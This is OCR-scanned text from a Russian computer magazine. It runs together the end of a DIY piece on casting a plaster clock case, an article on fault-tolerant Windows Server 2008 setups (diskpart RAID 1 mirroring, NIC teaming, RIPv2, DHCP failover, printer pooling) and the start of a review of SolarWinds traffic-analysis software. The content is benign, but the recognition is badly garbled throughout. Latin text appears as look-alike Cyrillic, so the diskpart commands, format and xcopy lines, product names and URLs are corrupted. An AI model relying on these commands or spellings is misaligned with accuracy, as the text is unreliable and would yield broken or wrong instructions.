Настоящий бетон мы использовать, конечно, не будем. Это нера- 
зумно, ведь время его схватывания составляет несколько дней, а 
полную прочность он набираеттолько через месяц. Вместо бетона 
мы будем использовать строительный гипс (алебастр). Работать 
с ним гораздо проще, смесь отвердеет за 1 0 минут, и будет иметь 
ровную поверхность с шероховатой фактурой, приятной на ощупь. 
Отливка корпуса производится поэтапно — каждая сторона отде- 
льно. Для этого требуется большой кусок стекла и несколько полос 
из жести. Стекло служит основой, а полосы опалубкой. Полосы, 
толщиной около 0,5 мм, скрепляются по углам плоскими магнита- 
ми с внешней стороны, таким образом, получается легко раз бор- 
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БЕЗ ОСОБЫХ ФИНАНСОВЫХЗАТРАТ МОЖНО СТАТЬ 
ОБЛАДАТЕЛЕМ КАМЕННЫХ ЧАСОВ ИЗ ЭПОХИ КИ- 
БЕРНЕТИКИ 




ОПАЛУБКА И ОТЛИВКА ВТОРОЙ СТЕНКИ 



УПРАВЛЯЮЩИЙ КОНТРОЛЕР 



ная конструкция многоразового применения. 

Сначала на листе бумаги размечается геометрия заготовки, 
после чего лист кладется под стекло. Затем по линиям будущих 
границ «крышки» подгоняется жестяная опалубка. После этого 
разводится гипс до консистенции жидкой сметаны и заливается в 
полученную форму. Время загустевания всего 2-3 минуты, поэтому 
работать нужно очень быстро и точно. С помощью шпателя смесь 
разравнивается по всей форме. Через 7-10 минут происходит 
отвердевание гипса. Заготовка становится теплой и прочной. 
Теперь опалубка разбирается и можно приступать к отделению 
заготовки от стекла. Так мы получили только одну стенку. Форми- 
рование остальных стенок корпуса проводится таким же образом. 
Первым делом необходимо примерить уже имеющуюся заготовку 
к вновь сформированной жестяной опалубке следующей сторо- 
ны будущего корпуса, чтобы она 
легко туда вставлялась, а стенки 
опалубки прилегали плотно. 

Сначала заливается гипсовая 
смесь, а потом уже встав- 
ляется заготовка, причем 
заготовка должна отлежаться 
еще минут 10 — иначе ровных 
стыков не получить. 

Пока гипстеплый и мокрый, 
еще не набрал полную проч- 
ность и его легко соскре- 
бать, надо быстро удалить 
все излишки. Если между 
сторонами имеются «щели» 
или при заливке образовалась 
раковина, то после полного 
затвердевания корпуса их 
легко «залечить» с помо- 
щью шпателя, сухой смеси и 
небольшого количества воды. 

Дно делается в самую послед- 
нюю очередь, после проделы- 
вания отверстий под неоновые 
индикаторы. 

Контур отверстий прорисо- 
вывается циркулем прямо 
на гипсе. Потом в центре 
просверливается несколько 
отверстий, и сердцевина акку- 
ратно выдавливается. Только 
никаких ударов! До нужного 



диаметра все доводится с помощью тонкостенной трубки -скреб- 
ка. Отверстия готовы и можно приступать к отливке дна. Гипс — 
пористый материал и ведет себя аналогично утеплителю, поэтому 
для нормальной работы электроники заднюю крышку делать не 
стоит. 

Внутри гипс все еще остается влажным, и чтобы корпус не повело, 
перед установкой электроники нужно оставить его на неделю в 
теплом месте. В процессе сушки корпус меняет цвет с темного на 
светло-серый. Когда гипс полностью высохнет, можно приступать 
к фиксированию неоновых индикаторов в отверстиях с помощью 
клея. На нижнюю плоскость корпуса бетонных часов наклеивают- 
ся резиновые ножки, и часы готовы! т 




Міхіе 1 



Мне 2 



Мшв 1 



МІхіе 2 
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ЗУИХАСК 



■ ■ СЕРГЕЙ «6ШШЁК» ЯРЕМЧУК 6&Ш0ЕК<©5ѴМАСК.Ки 



Эффект 

неваляшки 

Простые шаги для создания отказоустойчивого ѴѴіпсІоѵѵз-сервера 

Хороший админ не должен быть заметен. Послетого, как все настроено, 
он может спокойно заниматься своими делами, например, резаться в 
кваку или писать статьи в ~*-!~ . Его работа оценивается по стабильно ра- 
ботающему серверу и отсутствию жалоб со стороны пользователей. Но 
ведь неприятности обычно происходят в самый неподходящий момент и, 
хотя все ситуации предусмотреть просто нереально, кое-что все же мож- 
но предпринять. 



СОЗДАЕМ СОФТВАРНОЕ ЗЕРКАЛО Любое 
устройство современного компьютера может 
выйти из строя, и высокая стоимость ком- 
понента совершенно не гарантирует 100% 
надежность. Недолговечны и жесткие диски, 
хранящие тонны бесценной информации, по- 
теря которой может иметь любые последствия, 
вплоть до развала бизнеса. Традиционным 
способом сохранить данные является приме- 
нение систем резервирования, в ѴѴіп2к8 для 
этого используется компонент «Зегѵег Васкир», 
который пришел на смену мощной утилите 
ШБаскир. Но сегодня мы не будем устраивать 
бэкапные разборки, лучше поговорим о про- 
стом и при этом очень эффективном способе 
увеличения отказоустойчивости системы — 
создании софтварного НАГО 1. Напомню, что в 
массиве КАШ 1 используется зеркалирование 
двух дисков, что и обеспечивает высокую 
отказоустойчивость. При выходе из строя 
одного харда второй продолжает работать, 
как ни в чем не бывало. Чтобы восстановить 
массив, просто подключаем к серверу второй 
диск вместо неисправного. Единственный 
недостаток — это большая стоимость такого 
решения (на единицу объема) , по сравнению с 
однодисковым вариантом или копированием 
всех критических данных на внешнее устройс- 
тво для бэкапа. 

Процедура настройки КАШ 1 для системных 
дисков или дисков с данными в ѴѴіп2к8 несколь- 
ко отличается. Лонгхорн поддерживает два 
типа загрузки: МВК (Мазгег Воог Кесогб) и ОРТ 
(СИШ Раггігіоп ТаЫе) . Тип загрузки МВК разра- 
ботан специально для х86 систем и на сегодня 
является наиболее популярным. Тип ОРТ пер- 



воначально появился в системах на базе Капіит 
и сейчас широко используется при загрузке 
64-разрядных ОС. Настройка зеркалирования 
системных дисков для МВК и ОРТ также будет 
немного отличаться. 

Теперь последовательно разберем органи- 
зацию КАШ 1 для каждого случая. Начнем 
с системного диска, использующего МВК. 

После установки системы у нас должен быть 
один уже рабочий (системный) диски второй 
пока незадействованный диск, который будет 
зеркалом основного. Для управления хардами 
используем вкладку Эізк Мапа^етепг, — она 
доступна в Зегѵег Мапа§ег и в консоли Сотригег 
Мапа^етеш (сотрт§тГ.сзс). Перед созданием 
КАШ следует преобразовать диски в динами- 
ческие. Выбираем значок диска в поле внизу и в 
контекстном меню — пункт Сопѵегг Го Эупатіс 
Эізк («Преобразовать в динамический диск) . 
Далее отмечаем в появившемся окне Эізк 0, в 
окне Эізкго Сопѵегг подтверждаем свой выбор 
нажатием Сопѵегг. После преобразования 
диска в Эізк Мапа^етепг он будет помечен как 
Бупатіс. Эту операцию можно произвести 
в командной строке при помощи утилиты 
БІ5КРАКТ. Вызываем: 

> сіізкрагк 

Смотрим список дисков и некоторые их харак- 
теристики: 

с!ізкрагк> Іізк сіізк 

Подключаем сіізк 0 и преобразуем его в динами- 
ческий: 



с!ізкрагк> зеіеск сіізк О 

Бізк 0 із псж кііе зеіескесі сіізк. 

с!ізкрагк> сопѵегк сіупашіс 
БізкРагк зиссеззкиііу сопѵегкесі кііе 
зеіескесі сіізк ко сіупашіс когшак . 

Внимательно прочти сообщение после 
выполнения этой команды, в некоторых 
случаях для завершения операции требуется 
перезагрузка. 

С системным диском все. Подключаем второй 
винч. В случае, когда статус диска в Эізк 
Мапа^етепг показан как ОШіпе, активируем 
его выбором пункта ОпНпе в контекстном 
меню или аналогичной командой сіізкрагг. 
Если диск еще не размечен, эту операцию 
можно произвести при помощи самого Эізк 
Мапа^етепг, выбрав в меню пункт Іпігіаііге 
Эізк и затем тип таблицы разделов МВК или 
ОРТ. Далее преобразовываем его в динами- 
ческий диск самостоятельно или поручаем все 
операции мастерам. Выбираем первый диск 
и в контекстном меню щелкаем пункт АсМ 
Міггог; в появившемся окне отмечаем второй 
диск. Мастер предупредит, что он будет 
преобразован в Бупаппс Эізк, — соглашаемся, 
нажав ОК. Начнется процесс переноса данных 
на второй диск. По окончании в загрузчик 
будет добавлена возможность загрузки ОС со 
второго харда. 

В командной строке действия выполняют- 
ся также просто, правда, в отличие от Эізк 
Мапа§етепГ, здесь уже нет подстраховки, и 
допущенная ошибка может привести к потере 
данных. Смотрим список томов: 
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с!ізкрагк> Іізк ѵоіите 

Обычно загрузочный первый диск идет нулевым томом, выбираем его: 

с!ізкрагк> зеіеск ѵоіише О 
Ѵоіите 0 із кЬ.е зеіескесі ѵоіите. 

И создаем зеркало, указав в качестве параметра второй диск: 

с!ізкрагк> асИ с!ізк=1 

БізкРагк зиссеебеб іп асісііпд а тіггог ко кке ѵоіите. 

В процессе создания зеркала поле «Зіашз» команды «Ий ѵоіите» будет по- 
казывать значение «КеЪшМ»; когда оно изменится на «НеаМіу», процесс 
успешно завершен. 

Зеркалирование системных дисков, использующих ОРТ, чуть 
сложнее, так как ЕРІ (ЕхіепзіЫе Рігтѵѵаге Іпіегіасе, расширя- 
емый микропрограммный интерфейс) и М5К (ТЪе МісгозоН 
Кезегѵеб) разделы необходимо создавать вручную. Если второй 
хард уже содержит таблицу МВК, обязательно переконвертиру- 
ем его в ОРТ. Это можно сделать из меню Бізк Мапа^етепг или 
командой: 

с!ізкрагк> зеіеск сіізк 1 
с!ізкрагк> сопѵегк ОРТ 

БізкРагк зиссеззкиііу сопѵегкеб кке зеіескесі сіізк ко ОРТ 
когтак . 

Но диск можно конвертировать в ОРТ, только если он пуст, поэтому если 
на диске уже созданы разделы, последовательно удаляем их при помощи 
команд: 

с!ізкрагк> зеіеск рагкікіоп 1 
с!ізкрагк> беіеке рагкікіоп оѵеггісіе 

Теперь смотрим таблицу разделов системного диска, чтобы затем повто- 
рить ее на резервном: 

с!ізкрагк> зеіеск сіізк О 
с!ізкрагк> Іізк рагкікіоп 

Рагкікіоп ### Туре Зіге Оккзек 



Рагкікіоп 1 Зузкет 400 МВ 32 КВ 
Рагкікіоп 2 Ргітагу 13996 МВ 400 МВ 
Рагкікіоп 3 Кезегѵесі 32 МВ 14 СВ 



Переходим ко второму диску: 
бізкрагк> зеіеск сіізк 1 

Создаем системный ЕРІ-раздел размером 400 Мб: 

бізкрагк> сгеаке рагкікіоп екі зізе=400 

Бізкрагк зиссеебеб іп сгеакіпд кке зресікіесі рагкікіоп. 

В качестве дополнительного параметра можно задать смещение. Теперь 
М5К-раздел, который используется для хранения метаданных, не виден в 
Эізк Мапа§етепк Такой раздел рекомендуется создавать первым на дис- 
ке сданными и вторым на системном диске. При преобразовании МВК 
-> ОРТ раздел М5К создается автоматически, но его размер нас может не 
устраивать: 

с!ізкрагк> сгеаке рагкікіоп тзг зіге=32 

Бізкрагк зиссеебеб іп сгеакіпд кке зресікіесі рагкікіоп. 

После создания М5К и ЕРІ разделов необходимо отформатировать ЕРІ в 
РАТ. Для этого назначаем ему букву диска. В обычном варианте это мож- 
но было бы сделать через Эізк Мапа§етет, выбрав в контекстном меню 
пункт ІМеѵѵ Зітріе Ѵоіите и затем последовательно ответив на вопросы 
визарда, но с СРТ такой фокус не проходит, поэтому используем сіізкрагі:: 

с!ізкрагк> зеіеск сіізк 1 
бізкрагк> зеіеск рагкікіоп 1 
с!ізкрагк> аззідп 1еккег=Е 

БізкРагк зиссеззкиііу аззідпеб кЬ.е сігіѵе Іеккег ог тоипк 
роіпк . 

И — форматируем: 

С : \Міп<Зомз\зузкет32>когтак е: /кз:как /ц_ /у 

Осталось скопировать данные с раздела ЕРІ первого диска (пусть это 
будет Э): 

С : \Мпс1омз\зузкет32>хсору б:\*.* е: /з /Ь. 

Далее конвертируем диски в динамические (сопѵегібупатіс) имирро- 
рим, как для МВК. 

И, наконец, разберем, как создать КАІБ 1 для дисков сданными. В этом 
случае потребуется три диска: на первом (в сіізкрагі: обозначен как 
нулевой) будет установлена система, двадругих будут содержать данные. 
Здесь все просто: выбираем в контекстном меню одного из баіа-дисков 
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• Настройка ЫІ_В в 
ѴѴіп2кЗ рассмотрена 

в статье « Н е п ото п л я е - 
мый сервер», которую 
ты найдешь 
вх_02_2008. 

• Компонент«5егл/ег 
Васкир» для архивации 
использует службу 
ѴоІитеВЬасІоѵѵСору 
Вегѵісе. Подробнее о 
Вегѵег Васкир читай в 
статье «Лови момент!» 
взс_07_2008,ао 
службе Ѵ55 — в статье 
«Движение втени», 
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пункт Ыеѵѵ Міггогесі Ѵоіите и следуем указаниям визарда. 
Основной шаг — выбор второго диска. В командной строке 
нужно указать диск или том при помощи зеіесц а затем 
создать зеркало командой «асЫ сІІ5к= 2». Чтобы отключить 
зеркало, используем команду «Ъгеак сІІ5к= 2». 

Примечание редактора: чтобы повысить общий уровень 
надежности и защиты данных на критически важных серве- 
рах, зеркалированные диски можно разместить на разных 
дисковых контроллерах. Такая техника обеспечивает отка- 
зоустойчивость на уровне контроллеров и носит название 
«дуплексирование дисков». 

Также не забываем о распределенной файловой системе 
БР5, позволяющей объединять находящиеся на разных 

КОНВЕРТИРУЕМ ДИСКИ В ДИНАМИЧЕСКИЕ 



компьютерах ресурсы в единое логическое пространство 
имен. Данные в таком случае могут храниться на нескольких 
серверах с возможностью синхронизации информации. При 
выходе из строя одной системы это не скажется на работе 
сервисов. Подробнее о ЭРЗ ты можешь прочитать в статье 
«Страж файлового дерева», опубликованной в декабрьском 
номере ц-ц за 2007 год. 

ПОВЫШАЕМ НАДЕЖНОСТЬ СЕТИ Без сети любой ,даже 
очень дорогой современный сервер не имеет смысла, он поп- 
росту не сможет выполнять возложенные на него функции. 
Поэтому резервирование сетевых подключений является 
важным шагом построения отказоустойчивого сервера. При 
наличии двух однотипных сетевых карт их можно объеди- 
нить в одно псевдоустройство, которое будет восприниматься 
системой как обычный сетевой интерфейс со своими МАС- и 
ІР-адресами. Эта технология известна как «агрегация кана- 
лов» (Бтка^ге^аПоп, БАС) или «транкинг» (ітипкіп§) . 
Работая в паре, две сетевые карты обеспечивают практичес- 
ки вдвое большую пропускную способность, а при выходе 
из строя одной из карт всю нагрузку берет на себя вторая, 
доступ к сервису при этом не прерывается. В ядро Біпихуже 
встроена возможность объединения двух сетевых интерфей- 
сов в один Шпих-ір.пеі:/Ьі:т1/еі:Ьег-Ьопсііпч.Ьі:т1) . подобная 
технология заложена и в других операционках — *В50, Мае 
05 X, ОрепЗоІагіз. В ѴѴіпсіоѵѵз такой функциональности изна- 
чально не предусмотрено, поэтому, чтобы получить нужный 
результат, необходимо использовать сторонние драйвера 
и, как водится, для карт разных производителей придется 
искать свой вариант реализации. Зачастую решения разных 
фирм не совместимы между собой, и каждая компания 
в обозначении своей продукции указывает различные 
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названия транкинга (например, Сізсо ЕбіегСЬаппеІ ігіткіп^, Абаріес'з 
БигаНпк Игипкіп§ и т.д.) Именно по этой причине для организации транка 
рекомендуется использовать одинаковые адаптеры, а при выборе обору- 
дования для сервера следует учитывать наличие возможности работы в 
этом режиме. Немного ясности внесло принятие в 2000 году стандарта 
ІЕЕЕ 802. Заб (802. Заб Ііпк а§§ге§айоп Гог рагаііеі Нпк§), и сегодня многие 
решения выпускаются с поддержкой ІЕЕЕ 802. Заб. 

Основные производители серверов (НР, Беіі, ІВМ) часто используют 
сетевые адаптеры на микросхемах корпорации Вгоабсот, для которых на 
офсайте доступны необходимые драйвера и утилиты ВАС5 — Вгоабсот 
Абѵапсеб Сотгоі 5іте (уууууу.Ьгоабсот.сот/зирроп/егЬегпе! піс) . Кро- 
ме того, информацию о возможности использования ЬАС для сетевых 
карт конкретного производителя можно поискать на домашнем сайте. 
Для примера приведу описание доступных режимов для карт от Ітеі, ко- 
торое дано на странице (ѵѵѵѵѵѵ.ітеІ.сот/зиррогіі/пеГѵѵогкЛЬ/сз-ООРУб?. 
кит) . Как видим, заявлена поддержка четырех режимов ЬАС: 

• АЬВ (Абаргіѵе Ьоаб Ва1апсіп§, адаптивная балансировка нагрузки) — не 
требует поддержки коммутаторами, обеспечивает балансировку трафика 
с 2-8 карт только при передаче и на разные адреса, прием осуществляет 
лишь первый адаптер; 

• КЬВ (Кесеіѵе Ьоаб Ва1апсіп§, балансировка входящей нагрузки) — может 
использоваться с любым коммутатором, но только в сочетании с АЬВ, 
скоростные адаптеры участвуют в балансировке входящего трафика ТСР/ 
ІР, первый адаптер принимает весь остальной входящий трафик; 

• 5ЬА (Зіагіс Ііпк А§§ге§агіоп, он же Ітеі Ііпк А§§ге§агіоп, статическое 
объединение каналов) — обеспечивает двунаправленное выравнивание 
нагрузки, но требует наличия совместимых свитчей; 

• Эупатіс 802. Заб — совместим со стандартом 802. Заб, по возможнос- 
тям похож на предыдущий. 

То есть, режим АТ .В предназначен больше для обеспечения отказоустой- 
чивости, так как возможна балансировка только исходящих соединений. 
Остальные же режимы поддерживают и балансировку нагрузки как на 
прием, так и передачу. В картах других производителей режимы ЬАС 
могут отличаться по названию, хотя суть, как правило, меняется несу- 
щественно. Кстати, правильно определить интеловскую сетевуху можно, 
следуя инструкции по ссылке «Ібепбіу уоиг Абаріег» на странице ѵѵтѵ. 
ітеІ.сотАиррогі/пеПлюгк/абарііег . 

Для настройки продвинутых параметров сетевого адаптера, в том числе 
и для работы в транке, Ітеі предлагает собственную утилиту РКОЗеі: — 
ѵѵѵѵѵѵ.ітеІ.сот/зиррогі/пеіѵѵогк/зЪ/СЗ-ОІбОбІ.Іііт . Скачиваем и уста- 
навливаем драйвер обычным образом. Например, для 64-битной версии 
ѴѴіп7/2к8К2 нам нужен файл РКОѴ\Ш7Х64.ехе, обращаем попутно вни- 
мание на список поддерживаемых сетевых карт. Далее вызываем окно 
свойств одной из сетевух. После установки драйверов здесь появились 
дополнительные вкладки, где можно тонко настроить работу адаптера. 

В контексте статьи нас интересует вкладка Театіп§, переходим на нее и 
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устанавливаем флажок Теат йііз абартг ѵѵібі обіег абаріег. Чтобы создать 
группу из нескольких сетевых адаптеров, нажимаем кнопку Иеѵѵ Теат и, 
следуя указаниям мастера, вводим название группы, отмечаем сетевые 
карты, которые будут входить в группу, затем указываем режим работы 
(смотри выше) . По окончании настроек в системе появится еще один 
адаптер. Особо важные сервера следует подключать к сети с использова- 
нием двух транков, через два свитча. 

Также не стоит забывать о поддержке ѴѴіп2к8-протоколов ЮМР (Ітегпеі 
Сгоир Мапа§етет Ргоіосоі) и КІРѵ2 (Котіп§ ІпГогтагіоп Ргоіосоі) ; 
поддержка более удачного по сравнению с ШРѵ2 протокола 05РР (Ореп 
ЗЬогіезі: Рабі Еігзі) почему-то была убрана. Протокол ЮМР позволяет 
снизить нагрузку на сеть, доставляя широковещательные пакеты только 
адресатам, которые явно заявили о своей заинтересованности. Поэтому 
ЮМР часто используют для передачи аудио- и видеоинформации. Про- 
токол динамической маршрутизации ШРѵ2 более интересен в контексте 
статьи, так как позволяет обновлять информацию о маршрутах, выбирая 
оптимальный на данный момент. В случае выхода из строя одного из 
маршрутизаторов, клиентская система «узнает» об этом и получит новые 
таблицы. Это актуально и в случае, когда имеется несколько интернет- 
подключений, — отказ одного из них никак не скажется на пользовате- 
лях, которые смогут, как ни в чем не бывало, выходить через резервный 
канал. Хотя внешние подключения кУРЫ-серверам и сервисам в ЭМ2, 
наверняка, придется перенастраивать вручную (здесь многое зависит от 
топологии) . Чтобы исключить простои, следует использовать І5А Зегѵег 
2006/РогеГгот ТМС (подробнее о РогеГгот ТМС читай в предыдущем 
номере цс) , либо решения от сторонних производителей, вроде Кегіо 
ѴѴіпКоте Еігеѵѵаіі, ІІзегСаіе Рюху & Еігеѵѵаіі и другие. 

Помимо прочего, КІРѵ2 спасает админа от ручной настройки статичес- 
кой маршрутизации на каждом компьютере (командой «готе абб»), 
что особенно выручает в больших, разветвленных сетях. Чтобы устано- 
вить поддержку динамической маршрутизации, добавь роль Коийп§ 
апб Кетоіе Ассезз (ККА5) , выбрав вначале роль «Меідлгогк Роіісу апб 
Ассезз Зегѵісез». Теперь открываем консоль КПА5, которая находится в 
Абтіпізітаііѵе Тооіз, выбираем сервер и в контекстном меню — пункт 
«СопГі^иге апб ЕпаЫе Коийп§ апб Кетоіе Ассезз». Запустится визард, 
на втором шаге которого отмечаем «Сшіот Сопй^игайоп» и далее 
щелкаем ІІШ Котт^. После запуска службы станут доступны настрой- 
ки для ІРѵ4 и ІРѵб. Раскрываем список ІРѵ4, переходим в Сепегаі и в 
контекстном меню выбираем пункт Пеѵѵ Коибп§ Ргоіосоі. В появившем- 
ся списке щелкаем по ШР Ѵегзіоп 2 Гог Ітегпеі: Ргоіосоі, после чего во 
вкладке ІРѵ4 появится подпункт ШР. Теперь нужно настроить протокол. 
Выбираем ШР и в контекстном меню — пункт «Ыеѵѵ ІтегГасе». Мастер 
предложит выбрать интерфейс, и появится окно с соответствующими 
настройками. 
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НАСТРАИВАЕМ ОТКАЗОУСТОЙЧИВЫЙ РНСР- 
СЕРВИС Даже в не больших сетях для раздачи 
ІР-адресов и прочих сетевых настроек клиентам 
на порядок удобнее использовать БНСР-сервер, 
чем просто прописывать адреса в настройках 
каждой системы вручную (и затем бороться 
с конфликтами) . Управление ІР-адресами 
из одного места экономит кучу времени. 
Проблема в том, что теперь клиенты зависи- 
мы от работоспособности ПНСР-сервера, и в 
случае выхода его из строя не смогут получить 
ІР-адрес, соответственно, не смогут восполь- 
зоваться ресурсами локальной и глобальной 
сетей. Возможно несколько вариантов выхода. 
Самый очевидный — это создание кластера, в 
этом случае при отказе одного сервера второй 
возьмет на себя всю нагрузку. Вопрос построе- 
ния отказоустойчивого кластера для файлового 
сервера был рассмотрен в статье «Безотказный 
файлообменник», опубликованной в октябрь- 
ском номере цні за 2008 год; многие моменты по 
настройке пересекаются с созданием кластера 
для БНСР. 

Сервер \Уіп2к8К2 поддерживает протокол БНСР 
Раііоѵег ГшоІ5 . Іей, огч Лішіі /бгаЙ-іеЙ-бЬсДаіІоѵег- 

12) . использование которого позволяет двум 
серверам синхронизировать данные об аренде 
адресов между собой, но на БНСР-запросы 
отвечает только основной сервер. Резервный под- 
ключается, когда недоступен первый. Учитывая, 
что он «знает» все, что выдал основной сервер, 
переход на резервный полностью прозрачен. 
Установка роли ОНСР-сервера стандартна. 
Выбираем АсМ Коіез в Зегѵег Мапа^ег, отме- 
чаем «БНСР Зегѵег» в списке ролей. Далее 
следуют настройки работы сервера. Вводим 
настройки БЫЗ-сервера (домен и ІР-адрес), 
затем адрес ѴѴШ5-сервера, если такая служба 
будет использоваться. На шаге «БНСР Зсоре» 
задаем диапазон ІР, которым будет рулить 
наш сервер. Просто нажимаем Абс! и вводим: 
произвольное название, начальный и конеч- 
ный ІР, тип (беспроводная, проводная), адрес 
шлюза и маску сети. По окончании активируем 
область, установив флажок «Асііѵаіе іЫз зсоре». 
Определяемся, будем ли раздавать адреса ІРѵб; 
если нет, переключаем на шаге «ІРѵб зіаіеіезз 
тобе» флажок с ЕпаЫе на ОізаЫе. Проверяем 
и подтверждаем установки, щелкаем Іпзіаіі. 
Далее настраиваем Раііоѵег Сіизіег, как описано 
в статье «Безотказный файлообменник». 




НАСТР0ИКИШРѴ2ВѴѴШ2К8К2 



Очевидно, такой подход имеет преимущества 
в больших сетях, где серверы обслуживают 
большое количество запросов. В небольших 
компаниях, чтобы организовать резерви- 
рование БНСР, часто используют второй, 
как правило, несильно загруженный сервер, 
выполняющий другую работу. В этом случае 
ІР-адреса между серверами распределяются по 
схеме 80/20 (так советует Місгозоіт и многие 
источники, хотя это не догма, можно 70/30 или 
50/50), то есть основной сервер берет на себя 
80% адресов, оставшиеся 20 достаются второму 
серверу. Рассмотрим сеть класса «С»: сервер 
БНСРІ берет на себя 192.168.1.1-200, сервер 
БНСР2 — 192.168.1.201-254. Во избежание 
конфликтов на обоих серверах настраиваются 
исключаемые адреса (Ехсіибеб Абгеззез), в 
которые прописываются ІР-адреса, выдавае- 
мые другим сервером. Если основной сервер 
выйдет из строя, резервный сможет отвечать 
на запросы клиентов и обслуживать их аренду. 
При необходимости второй сервер можно легко 
перестроить на полный диапазон. 

Осталось добавить, что при наличии в сети 
контроллерадоменарольОНСР-сервера обычно 
возлагают именно на него. Хорошей практикой 
является использование двух контроллеров 
домена; при выходе из строя одного из них, второй 
будет выполнять все возложенные задачи (восста- 
новление и резервирование КД описано в статье 
< Лови момент» июльского номера □с за 2008 год) . 

СЕТЕВЫЕ ПРИНТЕРЫУправление сетевыми 
принтерами — дело весьма хлопотное: стоит 
выйти из строя одному, как админы вынуж- 
дены будут разбираться с недовольными 
менеджерами и другими представителями 
офисной фауны. Часто упростить себе жизнь 
можно, сгруппировав несколько идентичных 
принтеров {имеется в виду , что принте- 
ры должны иметь одного производителя , 
одинаковые модели , одинаковое коли- 
чество памяти и использовать одина- 



ковые драйвера, — Прим.ред.) в пул. В этом 
случае клиентские системы отсылают задания 
на одно логическое устройство печати, а 
сервер уже самостоятельно перенаправляет их 
первому доступному физическому принтеру. 
Такой подход позволит не только повысить 
доступность, но и равномернее распределить 
нагрузку на принтеры, увеличить отклик, а зна- 
чит, и производительность (пулинг не допустит 
ситуации, когда один принтер простаивает, а 
второй завален заданиями) . Хотя не следует 
бездумно включать эту опцию, необходимо 
учитывать и физическое расположение при- 
нтеров. Вряд ли пользователи будут в восторге, 
что нужно бегать по этажам в поисках своих 
распечаток. Кроме того, весьма нежелательно, 
чтобы ценные документы попадали на глаза 
тем лицам, для которых они не предназначены. 
Сгруппировать принтеры в пул достаточно 
просто. Для этого следует перейти во вкладку 
«Устройства и Принтеры» (Оеѵісез апб Ргітегз), 
расположенную в «Панели управления» (Сопігоі 
Сепіег) , вызвать окно свойств одного из принте- 
ров, которые будут добавлены в пул, и перейти 
во вкладку «Рогщ». Здесь требуется установить 
флажок «ЕпаЫе ргітег роо1іп§» и отметить уст- 
ройства, которые будут завязаны в пул. 

Еще одна ремарка от редактора: пулинг обеспе- 
чивает высокую доступность и отказоустойчи- 
вость для принтеров, но не для сервера печати, 
поэтому при необходимости можно настроить 
кластер печати по аналогии с тем, что рассказы- 
вается в упомянутой выше статье «Безотказный 
файлообменник». 

ЗАКЛ ЮЧ Е Н И Е Как видишь, чтобы построить 
отказоустойчивую сеть, нужно сделать совсем 
немного. Большая часть описанных техноло- 
гий не требует значительных временных или 
финансовых затрат, все достаточно просто и, 
можно сказать, обыденно. В обмен ты получишь 
кучу свободного времени, а также уважение 
коллег по работе . Удачи ! ц-ц 



► ііб 
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Боевой арсенал 
сисадмина 

Обзор полезного админского софта 

Сисадмину в своей работе постоянно приходится сталкиваться с боль- 
шим количеством самых разнообразных задач. Не все проблемы можно 
решить средствами ОС, поэтому специализированный софтна любой 
случай жизни должен быть всегда под рукой. 

Представленный в статье боекомплект будетхорошим 
подспорьем как в повседневных делах, так и в большинстве 
нештатных ситуаций. 



50І_АКѴѴІ№5 ОШОЫ ЫЕТРІ.ОѴѴТКАРРІС 
АЫАІ.Ѵ2ЕК (ЭТА) 3.5 

Разработчик: 5о1агѴѴіпсІ8 

\ѴеЬ : ѵѵѵѵѵѵ. 80 ІагѵѵіпсІ 8 . сот /ргосіисіз /ог іоп / 

піа 

Системные требования: Репііит III 1 ГГц и 
выше, 512 Мб ОЗУ 

ОС: ѴѴіпсІоѵѵя 2003/2008 5егѵег 32/64 бит 

Рано или поздно даже в тщательно спла- 
нированной сети, построенной с запасом 
«прочности», могут возникать перебои, 
которых, казалось бы, не должно быть даже 
теоретически. Падает производительность, 
возникают задержки, к которым в первую 
очередь чувствительны сервисы, работающие 
с мультимедиа данными и ѴоІР. Использование 
0о5, как правило, помогает незначительно, 
да и оценить эффективность произведенных 
установок не с чем. Большая часть программ 
(какснифер Ісрбитр) фиксирует лишь объем 
трафика, источники назначение, но опре- 
делить подобную проблему с их помощью 
невозможно. 

Первая мысль, которая приходит в голову — 
увеличить производительность за счет 
покупки новых коммутаторов и сетевых карт, 
обеспечивающих большую пропускную спо- 
собность, изменения топологии и прокладки 
еще пары сотен метров кабеля. Все это ведет 
к дополнительным затратам (денежным и 
временным), которые опять же не понятно, 
как подействуют. Но есть и другой выход — 
применить специальные инструменты, отсле- 
дить и найти причину заторов. Одной из таких 
программ является ЗоІагѴѴіпсІз Огіоп НеіРІоѵѵ 

► 118 



ТгаШс Апаіугег (ЭТА), которая, используя про- 
токолы Сізсо ЫеііРІоѵѵ, Л-РІоѵѵ, зЕІоѵѵ и ІРРІХ (ІР 
Ріоѵѵ Іпіогтайоп Ехрон), собирает с роутеров 
статистику по сетевому трафику и выдает в 
визуальной форме всю информацию по его ин- 
тенсивности и направлению. Администратор 
при помощи ЭТА получает полное представле- 
ние о том, сколько и какой пользователь, про- 
токол или приложение потребляет трафика. 
Результат выводится в виде таблиц и, что более 
наглядно, специальных схем. Визуальное 
представление позволяет четко оценить за- 
грузку сети и принять правильное решение. На 
графиках видны участки, где теряется больше 
пакетов, узлы с большим временем ответа, 
показана загрузка СРЕГ на узлах, доступен 
хит-парад самых прожорливых до памяти 
программ. Полученные данные позволяют со- 
ставить схему роста сети, определить затраты 
на трафик. Программа правильно распознает 
распределение трафика между различными 
источниками (НТТР, РТР, ѴоІР и так далее) 
и позволяет оценить утечку через внешние 
источники и приложения. Имеется полностью 
настраиваемый монитор трафика. 

Также стоит отметить систему отчетов, позво- 
ляющую получить данные по любому вопросу 
буквально за пару кликов. Доступны и отчеты 
по работе протокола Сізсо СВС^оЗ (Сіазз Вазеб 
(^иаШу оі Зегѵісе, контроль качества обслу- 
живания с разбивкой по классам) , что дает 
возможность оценить эффективность произве- 
денных настроек. Сізсо СВС^оЗ используется 
администраторами при создании политик, 
обеспечивающих максимальную производи- 



тельность важным сервисам. 

Демо-версию, которая будет полностью 
функциональна в течение 30 дней, можно 
свободно скачать с сайта производителя. Для 
установки, кроме собственно ЭТА, понадобит- 
ся Огіоп ПеіАлгогкРегіотапсе Мопіюг (ЫМР), 
поэтому, когда при загрузке будет предложено 
включить в архив и ЫМР, отказываться не 
стоит. Требования к железу, указанные на 
сайте, определяются запросами ЭТА, а это СРЕГ 
3 ГГц и 3 Гб ВАМ, но на самом деле достаточно 
минимально необходимых для работы ОС. Что 
касается софтовых рекомендаций, то они сле- 
дующие: 115 и БСД, Зегѵег 20055Р1/2008 в лю- 
бом варианте (Ехргезз/Згапбагб/Етегрпзе) . В 
зависимости от наличия 5 ОБ сервера, можно 
выбрать АбѵапсесІ или Ехргезз установку, в 
